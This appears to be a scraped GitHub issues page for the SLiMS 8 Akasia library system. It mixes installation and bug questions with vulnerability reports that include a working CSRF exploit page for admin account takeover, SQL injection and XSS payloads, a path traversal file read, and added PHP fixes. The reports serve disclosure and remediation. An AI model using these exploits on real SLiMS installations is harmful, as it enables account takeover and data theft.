slims / slims8_akasia
SLiMS 8 Akasia official source code repository
License: GNU General Public License v3.0
Dear, slims team!
Thank you for this awesome application.
In my institution, we use nginx instead of apache. Could you give me an example of a server block to install slims on an nginx web server?
Hello,
I found a reflected bug in the Circulation module in the keywords parameter. The impact of this bug includes, among others,
Proof of Concepts
Hello,
I found a reflected bug in the Bibliography module in the keywords parameter. The impact of this bug includes, among others,
Proof of Concepts
After struggling for quite a while, I finally managed to install Senayan Akasia on a server with the following specifications:
OS CentOS 7
web server nginx
PHP version 7.2.x
database MariaDB
At the start I ran into trouble with an unusual gettext.
Usually gettext uses _('foo'), not __('foo'), and the only information that appeared during installation was error 500.
I tried to find any writing about this problem and there was not a single satisfactory piece of information.
Finally, after I tried using the CLI, a bright spot started to appear.
It turns out this system needs php-mbstring, and that is not in the warnings during installation.
Please write the requirements in the readme to make installation easier on servers that do not use an installer package such as XAMPP.
When adding a new item to a bibliography with the Add item Button, I get
Invalid Submission Token
when I click update. The item is still added though.
Hello guys, Senayan devs.
I want to ask, is there a guide for building additional (custom) modules for SLiMS 8?
Hi, please help with a solution for:
"Error requesting page : /admin/modules/sms_gateway/index.php?ajaxload=1". It seems to be in the adjustment of the PHP location in daemon.bat...
Please enlighten me...
Hello, how do I add a super user, like the initial ID at installation? Because in our library institution there will be 2 administrators responsible for managing this application, and each administrator must have 1 super user ID.
if you define fields in member_custom_fields.inc.php and create them in the member_custom table, you get an error message when saving a member: "Unknown column 'customfield1' in 'field list'".
If you create the fields in the member table it works. But this is not the intended way to do it, is it?
The Promote Book cover thumbnail can be displayed on the Home page, but on the search results and book detail pages the cover cannot be displayed. This problem appears when SLiMS is installed on a hosting provider.
I have tried modifying the .htaccess file by adding the following code:
# Modification for when cover images cannot be displayed
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
but OPAC still cannot display the cover thumbnails..
Please enlighten me...
I think this lightweight public template is a modern and light template, but its visitor count function does not work; after I investigated, it turned out there is a problem in its JavaScript part in meta.php
replacing and adding this script:
Becomes
<script src="/default/js/jquery.min.js"></script> <script src="gui.js"></script> on the last line of the meta.php file
There are multiple issues with editing and deleting items from the "RDA Media Type" and "RDA Carrier Type" in the master_file module
This problem has existed since SLiMS Cendana.
The problem is in sysconfig.inc.php
on line 117.
$temp_senayan_web_root_dir = preg_replace('@admin.*@i', '', dirname(@$_SERVER['PHP_SELF']));
The problem comes from dirname
on Windows, which returns backslashes instead of forward slashes. The code can be changed to:
$temp_senayan_web_root_dir = preg_replace('@admin.*@i', '', str_replace('\\', '/', dirname(@$_SERVER['PHP_SELF'])));
Is there an EER diagram for the slims8_akasia database?
I want to see the relations between the tables to make them easier to understand. Thank you
How do I apply auto increment to the item code and inventory code in SLiMS Akasia?
Thank you
While updating the translations I noticed that the citation popup for titles whose author name is not in the format "lastname, firstname" only displays the lastname, nothing else. For me it doesn't matter, because I don't need that feature, but maybe you want to fix it anyway.
The problematic code is in lib/contents/cite.inc.php:
foreach ($authors as $auth) {
// invert first author name if it is not inverted
if ($a == 0 && stripos($auth['author_name'], ',', 2) === false) {
$last_name = strrpos($auth['author_name'], ' ') + 1;
$name = substr($auth['author_name'], $last_name);
die($name);
$author_list[] = $name;
} else {
$author_list[] = $auth['author_name'];
}
$last_author = $auth['author_name'];
$a++;
}
The problem is the "die()", but the rest of the code also looks unfinished, because the intention seems to be to invert the first and the last name, but the code never extracts the first name. Also the variable $last_author is never used and more complicated cases like authors with only a first or only a last name or authors with multiple last names are not addressed. Maybe it's better to remove the code to invert first and last name, because it can't be programmed in a way that gives correct results for authors with multiple last names while also working for authors with multiple first names.
Apakah API di slims8_akasia sudah bisa digunakan? Transaksi apa saja yang sudah bisa dilakukan melalui API?
I've managed to install fresh slims with this configuration:
When I try to create a new librarian on System - Librarian & System Users - add new user: after I filled in all the fields and pressed save, the browser seems to reload the page but nothing else happened. I checked the database, no user has been added.
This behaviour also happened on the User Group page.
Any other suggestion on this matter?
Hello,
I found a security bug in the update admin feature; that feature already has CSRF protection, but it can be bypassed.
Through this bug and carelessness of the (admin level) user, an attacker can fully take over the admin account.
Proof of concept
When updating admin data there is already a CSRF token.
Unfortunately, however, there is no server-side check for the presence of the csrf_token parameter. The csrf_token parameter can be removed when the data is POSTed, so the protection can be bypassed. The following is a CSRF exploit script that can be used to exploit this vulnerability
<html>
<body onload="submitRequest()">
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/192.168.100.18:81\/slims\/admin\/modules\/system\/app_user.php?changecurrent=true&action=detail&ajaxload=1", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=--------863798609");
xhr.withCredentials = true;
var body = "----------863798609\r\n" +
"Content-Disposition: form-data; name=\"form_name\"\r\n" +
"\r\n" +
"mainForm\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"userName\"\r\n" +
"\r\n" +
"admin\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"realName\"\r\n" +
"\r\n" +
"admin\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"userType\"\r\n" +
"\r\n" +
"1\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"eMail\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[fb]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[tw]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[li]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[rd]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[pn]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[gp]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[yt]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[bl]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[ym]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"base64picstring\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"passwd1\"\r\n" +
"\r\n" +
"faisal\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"passwd2\"\r\n" +
"\r\n" +
"faisal\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"saveData\"\r\n" +
"\r\n" +
"Update\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"updateRecordID\"\r\n" +
"\r\n" +
"1\r\n" +
"----------863798609--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
</body>
</html>
Save the exploit script above as an HTML file.
Send exploit.html to a victim who is logged in to their SLiMS.
The following is the response from the resulting change of the admin data.
After it succeeds, the attacker can take over the account by logging in to the victim's SLiMS system using
username : admin
password : faisal
how do I add a connection to 2 databases in SLiMS..
Hi, I have found some critical bugs in Slims8 Akasia 8.3.1 (latest version).
First, There is a sql injection bug in this url:
$table_name = $dbs->escape_string(trim($_POST['tableName']));
<--striped-->
// append table name
$sql_string .= " FROM $table_name ";
if ($criteria) { $sql_string .= " WHERE $criteria LIMIT $limit"; }
// send query to database
$query = $dbs->query($sql_string);
You have escaped the tableName string. But actually it just appends a backslash \ before ', ", or \. Reference from PHP mysql_real_escape_string.
So my POST variable tableName will trigger SQL injection if it does not contain these chars.
Example: tableName = user where 1=0 union select version()--
And also
$table_fields = trim($_POST['tableFields']);
<--striped-->
// explode table fields data
$fields = str_replace(':', ', ', $table_fields);
// set where criteria
$criteria = '';
foreach (explode(':', $table_fields) as $field) {
$criteria .= " $field LIKE '%$keywords%' OR";
}
// remove the last OR
$criteria = substr_replace($criteria, '', -2);
$sql_string = "SELECT $fields ";
The variable tableFields is not sanitized for the SQL query yet. So it'll trigger injection like this
These 2 urls have the same problems
This bug is executable by everyone who has the librarian role (single).
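Added here as an illustration of the fix this report points at, and not code from the SLiMS project: the query builder rebuilt so that tableName and tableFields are checked against an allow-list of known tables and columns (escaping cannot stop an identifier such as "user where 1=0 union select version()--" because it contains none of the characters escape_string() touches), while the keywords value is bound as a parameter. The allow-list contents, the mysqli connection and the credentials are assumptions.

```php
<?php
// Added example (not SLiMS code). Allowed tables and their columns are
// assumed; in a real deployment they come from the schema, not from the user.
const ALLOWED_TABLES = [
    'user'   => ['user_id', 'username', 'realname'],
    'member' => ['member_id', 'member_name', 'email'],
];

// Validate the requested table and the ':'-separated field list.
// Returns [table, columns] or null if any identifier is not allow-listed.
function validate_target(string $table, string $fields): ?array {
    if (!array_key_exists($table, ALLOWED_TABLES)) {
        return null;
    }
    $cols = array_filter(explode(':', $fields), 'strlen');
    if ($cols === [] || array_diff($cols, ALLOWED_TABLES[$table]) !== []) {
        return null;
    }
    return [$table, array_values($cols)];
}

// Build the statement from allow-listed identifiers only; the search term
// is bound, so it never becomes part of the SQL text. '%' and '_' in the
// term are escaped so they are matched literally rather than as wildcards.
function build_search(mysqli $db, string $table, array $cols, string $kw, int $limit): mysqli_stmt {
    $quoted  = array_map(function ($c) { return "`$c`"; }, $cols);
    $where   = implode(' OR ', array_map(function ($c) { return "$c LIKE ?"; }, $quoted));
    $sql     = 'SELECT ' . implode(', ', $quoted) . " FROM `$table` WHERE $where LIMIT ?";
    $stmt    = $db->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $pattern = '%' . addcslashes($kw, '%_\\') . '%';
    $params  = array_fill(0, count($cols), $pattern);
    $params[] = $limit;
    $stmt->bind_param(str_repeat('s', count($cols)) . 'i', ...$params);
    return $stmt;
}

// Request handling; the POST field names follow the report.
$target = validate_target($_POST['tableName'] ?? '', $_POST['tableFields'] ?? '');
if ($target === null) {
    http_response_code(400);
    exit('Unknown table or field');
}
[$table, $cols] = $target;
$db   = new mysqli('localhost', 'dbuser', 'dbpass', 'senayandb'); // assumed credentials
$stmt = build_search($db, $table, $cols, $_POST['keywords'] ?? '', 20);
$stmt->execute();
```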
The title on bibliography can't be updated if you edited from item list
The image upload is broken. I tried in several browsers and what it does is double the ".png" or ".jpeg", then it won't display in the OPAC. So I tried manually modifying the database and the issue still arises. I'm not familiar enough with the project to find the issue, but I think it has to do with the way it is stored. I have a feeling it is being stored in the MySQL database, not as a file in the folder it is installed in, since I don't see any file generation there.
Also I'd like to see an added feature of file lookup through a source like Library of Congress or WorldCat. Something like that.
How do I show the type of collection in the OPAC?
maybe as a line in the box in the availability area
That's all, please advise..
The member card print layout is messy when the system is switched to Indonesian,
whereas when using English it is normal.
SLiMS Akasia
Hi, there is an arbitrary file read bug in
if(isset($_GET['url']) && !empty($_GET['url'])) {
$file_path = HELP.'/'.$sysconf['default_lang'].'/'.$_GET['url'];
if(!file_exists($file_path)) {
echo __('File Not Found');
} else {
//Convert Markdown to HTML
$markdown_text = file_get_contents($file_path); //bibliography/add-new-bibliography.md
We can traverse the directory path and use an arbitrary filename in $_GET['url'].
So an attacker can read any file (including source code, config) in the system.
PoC
This bug is executable by everyone who has the librarian role (single).
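Added example, not code from the SLiMS project: a hardened version of the help-page loader quoted above. HELP, $sysconf['default_lang'] and __() follow the snippet; the resolve_help_file() helper and its canonical-path check are the added part.

```php
<?php
// Added example (not SLiMS code). Resolves a help page name from the request
// to a file inside the help tree, or returns null when it must not be served.
function resolve_help_file(string $base_dir, string $lang, string $url): ?string {
    // Only Markdown pages live in the help tree; anything else is refused early.
    if (!preg_match('~^[A-Za-z0-9_./-]+\.md$~', $url)) {
        return null;
    }
    $root = realpath($base_dir . '/' . $lang);
    $path = realpath($base_dir . '/' . $lang . '/' . $url);
    if ($root === false || $path === false) {
        return null; // directory or file does not exist
    }
    // realpath() has already collapsed "../" segments and symlinks, so a
    // prefix check on the canonical path is what keeps reads inside $root.
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

if (isset($_GET['url']) && $_GET['url'] !== '') {
    $file_path = resolve_help_file(HELP, $sysconf['default_lang'], $_GET['url']);
    if ($file_path === null) {
        echo __('File Not Found');
    } else {
        // Convert Markdown to HTML as before
        $markdown_text = file_get_contents($file_path);
    }
}
```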
What is the best way to translate Strings which are in .js files?
So far I found the following untranslated Strings:
For the first one I wrote a patch that translates the String in PHP and puts it into the HTML where the JS can read it later. But this is not a very clean solution and not so easy for other Strings(e.g. the day and month names in the calendar)
In the Change User Profile function, there is no Old password to confirm a user password change, and also no CSRF Token to protect against malicious CSRF requests. Reference OWASP.
So when the admin user accesses a malicious web page, it will trigger an automatic change of the admin password to the attacker's password.
Example request:
userName=admin
&realName=Admin
&userType=1
&eMail=
&social[fb]=
&social[tw]=
&social[li]=
&social[rd]=
&social[pn]=
&social[gp]=
&social[yt]=
&social[bl]=
&social[ym]=
&image=
&base64picstring=
&passwd1=trichimtrich
&passwd2=trichimtrich
&saveData=Update
&updateRecordID=1
This will change the admin password to trichimtrich
And also, there is a stored XSS in here too. All the fields realName, eMail, social[xx] have the same problem.
Sample request:
&realName=Admin" autofocus onfocus="alert(1)
An attacker can trigger the admin to execute arbitrary JavaScript to do anything.
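Both this report and the earlier CSRF report (the one whose exploit script removes the csrf_token field) describe the same three gaps in the profile update handler: a token that is emitted but never verified on the server, no old-password confirmation, and profile fields echoed back unescaped. The following is an added example of how the server side of that handler could close all three; it is not SLiMS code, and the field names old_passwd and the stored password hash are assumptions.

```php
<?php
// Added example (not SLiMS code). POST field names other than old_passwd
// follow the request bodies in the reports above.
session_start();

// One token per session; the form emits it as a hidden csrf_token field.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Fail when the field is absent, not a string, or does not match. Dropping
// the field from the POST body (the reported bypass) now fails isset().
// hash_equals() compares in constant time.
function csrf_check(array $post): bool {
    return isset($post['csrf_token'], $_SESSION['csrf_token'])
        && is_string($post['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $post['csrf_token']);
}

// A password change must prove knowledge of the current password.
function password_change_allowed(array $post, string $stored_hash): bool {
    if (!isset($post['old_passwd'], $post['passwd1'], $post['passwd2'])) {
        return false;
    }
    return $post['passwd1'] === $post['passwd2']
        && password_verify($post['old_passwd'], $stored_hash);
}

// Encode every value that is rendered back into HTML (realName, eMail, social[*]),
// which neutralises the reported realName="... autofocus onfocus=..." payload.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    if (isset($_POST['passwd1']) && $_POST['passwd1'] !== '') {
        $stored_hash = '<hash loaded from the user row>'; // assumed lookup
        if (!password_change_allowed($_POST, $stored_hash)) {
            http_response_code(403);
            exit('Old password required');
        }
    }
    // ... persist the update here, then render with h() ...
    echo '<p>Profile updated for ' . h($_POST['realName'] ?? '') . '</p>';
}
```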
When going through in install steps described here http://slims.web.id/goslims/?wpdmpro=dokumentasi-resmi-slims-bahasa-inggris , I cannot load the senayan.sql because of an error here https://github.com/slims/slims8_akasia/blob/master/install/senayan.sql#L12-L18 .
> mysql -u root senayandb < install/senayan.sql
ERROR 1067 (42000) at line 12: Invalid default value for 'backup_time'
I'm trying to install on macOS, with mysql version:
> mysql --version
mysql Ver 14.14 Distrib 5.7.15, for osx10.12 (x86_64)
Is there a dependency on a specific version of mysql? Also, is there a list of dependencies with versions?
Thanks very much for your help and development on this project :)
Thank you!
Does SLiMS Akasia have a plugin for counting website visitors??
Can this SLiMS embed a flipbook??
I get this message when I want to import member CSV data
Error requesting page : /admin/modules/membership/import.php?ajaxload=1undefined
and there is another message with similar wording when opening several menus, such as bibliography and others
Error requesting page : /admin/modules/system/sys_log.php?ajaxload=1undefined
Before this I imported about 3000 bibliographic records. It succeeded, and the data appeared for a while. But after some time the 2nd message sometimes appears and the book data does not show.
Please help, thank you SLiMS team!
Barcode problem if the item number uses a space char and a slash char.
It was fixed before in dicarve/slims8_akasia@24588ae
Hello, I just changed the loan period from 14 days to 21 days. But even though I changed it, and even tried deleting the old loan rules, the due date that appears is still 14 days from the loan date. The due date has to be changed manually to make it 21 days. Why might that be?
I tried to print a member card, but a pop-up window appeared
"Object not found!
The requested URL was not found on this server. The link on the referring page seems to be wrong or outdated. Please inform the author of that page about the error.
If you think this is a server error, please contact the webmaster.
Error 404
localhost
Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.5.30 "
what is that?? I don't understand. Please help
Please do check the loan rules attached to circulation, because we have a concern here. When someone makes a loan rule and then makes a loan based on that loan rule, that loan rule is bound to that person. But when that someone erases that particular loan rule, all data related to the erased loan rule will be gone too, and the admin will be confused.
Please do check.
The menu toggle in the default template is missing in this version.